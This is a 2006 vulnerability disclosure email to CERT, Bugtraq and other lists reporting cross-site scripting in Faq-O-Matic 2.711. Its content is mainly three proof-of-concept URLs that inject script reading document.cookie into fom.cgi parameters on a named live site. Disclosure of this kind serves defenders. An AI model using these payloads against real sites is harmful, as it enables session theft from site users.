From: preddy . <lil.turk@email.com>
To: cert@cert.org, Vuln@frsirt.com, moderators@osvdb.org, vuln@secunia.com, bugtraq@securityfocus.com
Date: Sun, 15 Jan 2006 15:43:24 -0500
Subject: [OSVDB Mods] Faq-O-Matic 2.711 - Cross Site Scripting

Faq-O-Matic 2.711 - Cross Site Scripting

Vendor URL: http://faqomatic.sourceforge.net/

PoC:

http://www.openh323.org/openh323/fom.cgi?cmd=recent&file=1&showLastModified=show&_submit=Show+documents&_duration="><script>ale
rt(document.cookie)</script>


http://www.openh323.org/openh323/fom.cgi?file="><script>alert(document.cookie)</script>&showLastModified=show

http://www.openh323.org/openh323/fom.cgi?_insert=answer&cmd="><script>alert(document.cookie)</script>&file=1

Preddy
RootShell Security Group